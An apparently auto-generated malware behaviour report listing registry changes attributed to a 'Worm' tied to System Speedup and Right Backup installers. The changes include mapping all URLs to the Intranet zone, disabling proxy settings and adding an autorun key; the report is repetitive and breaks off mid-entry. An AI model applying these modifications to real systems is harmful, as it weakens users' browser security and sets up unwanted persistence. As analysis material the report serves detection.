[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"NoModify" = "1"
[HKLM\SOFTWARE\Deeal]
"IExplore" = "True"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"~aclxxmg.exe" = "betadeeal service scheduler"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 74 06 83 1A 54 5B 83 50 ED 8C 6F 51 12 76 EB"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Deeal]
"Version" = "1.0.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ~nvpitzc.exe:1180 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\WinU\1.0]
"LastExecuted" = "2014/08/13"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 E0 01 50 37 59 9B 68 F3 54 11 B3 AB 32 EB 8C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\WinU\1.0]
"Delay" = "31"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process aspsetup.exe:3592 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 8D 47 35 B3 22 51 C2 3C AA 43 36 66 13 E9 B5"
The process SystemSpeedup.exe:2964 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\System Speedup]
"RegErrsFixedLast" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
[HKCU\Software\System Speedup]
"AutoRepair" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\System Speedup]
"FirstRun" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
[HKLM\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\System Speedup]
"SetChkREmovableMedia" = "1"
"StartMinimized" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\System Speedup]
"StrLastScan" = ""
"SetChkSkipEmptyKeys" = "1"
[HKCU\Software\Licenses]
"{K7C0DB872A3F777C0}" = "C2 3D 23 EA 47 16 1F BD 37 63 C4 58 D5 74 D9 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\System Speedup]
"ConfirmBkUps" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\System Speedup]
"ScheduledTime" = "먀"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\System Speedup]
"systweakasp.exe" = "ASP"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\System Speedup]
"StartWhenWinBoots" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\System Speedup]
"SetEnableSound" = "1"
"StrLatestRegDefrag" = ""
"RegErrFoundTillDate" = "0"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "SystemSpeedup.exe"
[HKCU\Software\System Speedup]
"ErrorCount" = "0"
"StrLatestRestorePoint" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\System Speedup]
"StrLastScanResults" = "0"
[HKLM\SOFTWARE\System Speedup]
"FirstTimeASPFired" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 42 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\System Speedup]
"StartScan" = "0"
"GoToSystemTrayOnClose" = "0"
"StrLastStartupOpt" = "縀"
[HKCR\CLSID\{76734917-C9BB-5EEB-687F-E3CFD38515A2}\TreatAs]
"(Default)" = "{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBB}"
[HKCU\Software\Licenses]
"{064BC08A8370B1DF4}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 7C A5 44 A3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1405603097"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\System Speedup]
"StrLastOptimizeTime" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB B6 E6 91 C7 D4 37 96 58 0E 45 AD 1F CA 41 50"
[HKLM\SOFTWARE\System Speedup]
"Expired" = "0"
[HKCU\Software\System Speedup]
"ImprovementProgram" = "1"
[HKCU\Software\Licenses]
"{R7C0DB872A3F777C0}" = "4A 8D 7D 4C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\System Speedup]
"StartAutoScanPMUI" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\System Speedup]
"NumTimesRCPRunned" = "1"
"SetChkDontShowRedTrayPopup" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Licenses]
"{I64BC08A8370B1DF4}" = "01 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\System Speedup]
"RegErrsFixedTillDate" = "0"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SSUPRDReminder" = "%Program Files%\System Speedup\SystemSpeedup.exe -rem"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"~ssqyvbc.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-CNDS9.tmp]
"ssupsetup_sbinstall3_sbinstall3.tmp"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Perl\bin]
"perl.exe"
[HKCR\CLSID\{76734917-C9BB-5EEB-687F-E3CFD38515A2}]
"0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process rightbackupsetup.tmp:3308 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Systweak\Params]
"utm_campaign" = "sbinstall3"
[HKLM\SOFTWARE\Systweak\Right Backup]
"utm_source" = "sbinstall3"
[HKCU\Software\systweak\Right Backup]
"utm_medium" = "newbuild"
[HKLM\SOFTWARE\Systweak\Right Backup]
"IsSilent" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Systweak\Params]
"affiliateid" = ""
[HKCU\Software\systweak\Right Backup]
"utm_source" = "sbinstall3"
[HKLM\SOFTWARE\Systweak\Right Backup]
"RenewNowURL" = "http://www.rightbackup.com/autologin/?renew=1&"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Systweak\Right Backup]
"x-at" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Systweak\Params]
"TELNO" = "(855) 737-4054"
"utm_medium" = "newbuild"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Systweak\Right Backup]
"BuyNowURL" = "http://www.rightbackup.com/autologin/?"
"CplUrl" = "http://www.rightbackup.com/autologin/"
[HKLM\SOFTWARE\Systweak\Params]
"utm_source" = "sbinstall3"
[HKCU\Software\systweak\Right Backup]
"TELNO" = "(855) 737-4054"
[HKLM\SOFTWARE\Systweak\Right Backup]
"utm_campaign" = "sbinstall3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Systweak\Right Backup]
"utm_medium" = "newbuild"
[HKCU\Software\systweak\Right Backup]
"affiliateid" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 AB 03 17 3B 7C 5E A1 3C 43 9C 9D 21 2E E6 D7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Systweak\Right Backup]
"affiliateid" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Systweak\Right Backup]
"TELNO" = "(855) 737-4054"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\systweak\Right Backup]
"utm_campaign" = "sbinstall3"
[HKLM\SOFTWARE\Systweak\Params]
"x-at" = ""
[HKCU\Software\systweak\Right Backup]
"x-at" = ""
[HKLM\SOFTWARE\Systweak\Right Backup]
"isphone" = "1"
"CplUrl" = "http://www.rightbackup.com/?"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
The Worm disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Right Backup_startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Right Backup_startup"
"Right Backup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Right Backup"
The process MsiExec.exe:1180 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 61 42 29 53 AB 95 1A E0 B3 4D 29 7E ED 40 36"
The process ~aclxxmg.exe:3608 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 4D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 7E FF D0 D3 24 EA 19 16 26 52 E2 2B D3 84 24"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process taskkill.exe:3808 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 47 3E 25 99 FD F2 A8 B7 41 AA 22 B0 3E C9 27"
The process taskkill.exe:3864 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E EE D3 19 CF 60 D2 63 8B 99 F0 BD 48 A1 2B C5"
The process taskkill.exe:3140 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 63 79 12 3A 00 CD FB 73 C2 B3 D4 4D E5 2F BB"
The process taskkill.exe:2096 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 9A 41 31 22 BC DF 4F E7 A0 62 B0 0D 41 0F D8"
The process taskkill.exe:3536 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE E6 8C 5A 51 43 F4 16 4F 26 19 AD 05 E0 FE AC"
The process taskkill.exe:3296 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA BA 51 DE 4B E1 4F 72 96 98 EC 3D 74 E3 82 99"
The process taskkill.exe:3368 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 DC 25 A5 29 DA E9 2A 69 3F 5A 12 6E 9F 12 59"
The process taskkill.exe:3576 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 5B DB 79 A7 C7 90 26 14 1C DA B6 B8 F1 83 E2"
The process taskkill.exe:3100 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 42 FF 97 01 32 06 BC A0 EE 55 48 E6 7F 1B 1B"
The process taskkill.exe:3436 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 9B 50 2E 55 F4 D8 35 CA 07 69 00 AD 48 54 3E"
The process taskkill.exe:3664 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F F4 BC 36 70 D4 41 66 DD 28 B5 6A 05 A0 18 9D"
The process taskkill.exe:3764 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 6F BD B3 8A 99 15 56 EE 96 7A 58 8C 43 AE C5"
The process taskkill.exe:3604 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 21 E7 27 F9 6A 0A A5 D9 9F AA B9 BA 9B 0C B4"
The process taskkill.exe:460 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 29 F6 98 7B 0A A7 7A 0C 17 E4 20 30 69 A1 26"
The process taskkill.exe:3708 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 33 48 3F 8F D4 62 6D 28 A6 1A 4E D9 C0 6F EA"
The process taskkill.exe:3264 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 7F C6 89 D8 5E A3 A4 59 5E 5A 4D A0 1E 26 2A"
The process taskkill.exe:3408 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
